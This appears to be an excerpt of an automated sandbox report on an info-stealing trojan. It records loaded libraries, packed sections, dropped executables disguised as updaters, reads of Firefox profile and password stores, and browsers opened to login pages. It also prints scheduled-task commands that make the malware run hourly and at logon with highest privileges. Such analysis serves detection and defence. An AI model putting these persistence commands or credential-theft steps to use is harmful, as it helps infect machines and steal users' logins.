                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: pcacli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: sfc_os.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeSection loaded: sppc.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: mstask.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: dui70.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: duser.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: chartv.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: oleacc.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: atlthunk.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: winsta.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: explorerframe.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeSection loaded: profapi.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: apphelp.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: acgenral.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmm.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: samcli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: msacm32.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: version.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: userenv.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: dwmapi.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: urlmon.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: mpr.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sspicli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: winmmbase.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: iertutil.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: srvcli.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: netutils.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: aclayers.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sfc.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: sfc_os.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeSection loaded: kernel.appcore.dll
                          Source: I2jCDr35mu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: I2jCDr35mu.exeStatic PE information: Section: ZLIB complexity 0.9993802584134616
                          Source: I2jCDr35mu.exeStatic PE information: Section: awogigmw ZLIB complexity 0.9910564070865556
                          Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9993802584134616
                          Source: RageMP131.exe.0.drStatic PE information: Section: awogigmw ZLIB complexity 0.9910564070865556
                          Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9993802584134616
                          Source: MPGPH131.exe.0.drStatic PE information: Section: awogigmw ZLIB complexity 0.9910564070865556
                          Source: plaza[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: plaza[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: plaza[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: ladas[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: ladas[1].exe.0.drStatic PE information: Section: gakjennq ZLIB complexity 0.9947299890350877
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: amert[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: amert[1].exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: EdgeMS131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: EdgeMS131.exe.0.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: niks[1].exe.0.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: Section: gakjennq ZLIB complexity 0.9947299890350877
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: plaza[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: plaza[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: plaza[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: Section: ZLIB complexity 0.999699193329718
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: Section: ZLIB complexity 0.9969692887931034
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: Section: ZLIB complexity 0.9916796875
                          Source: ladas[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: Section: ZLIB complexity 0.9998560855263158
                          Source: amert[1].exe.7.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: amert[1].exe.7.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: niks[1].exe.7.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: Section: odmizeae ZLIB complexity 0.9946027534579164
                          Source: explorgu.exe.47.drStatic PE information: Section: ZLIB complexity 0.9977993715564738
                          Source: explorgu.exe.47.drStatic PE information: Section: tfywulqz ZLIB complexity 0.9940085123400365
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@192/738@0/95
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\RageMP131
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10376:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10612:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\rage131MP.tmp
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                          Source: I2jCDr35mu.exe, 00000000.00000003.2209264582.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2210367061.0000000005C7A000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2222296386.0000000005C65000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2209414810.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2276915564.0000000001491000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2272286943.0000000006295000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2212771749.0000000001518000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2211562398.000000000151D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2210888173.0000000001518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: I2jCDr35mu.exeReversingLabs: Detection: 39%
                          Source: I2jCDr35mu.exeVirustotal: Detection: 41%
                          Source: I2jCDr35mu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile read: C:\Users\user\Desktop\I2jCDr35mu.exe
                          Source: unknownProcess created: C:\Users\user\Desktop\I2jCDr35mu.exe C:\Users\user\Desktop\I2jCDr35mu.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                          Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe"
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                          Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video --attempting-deelevation
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
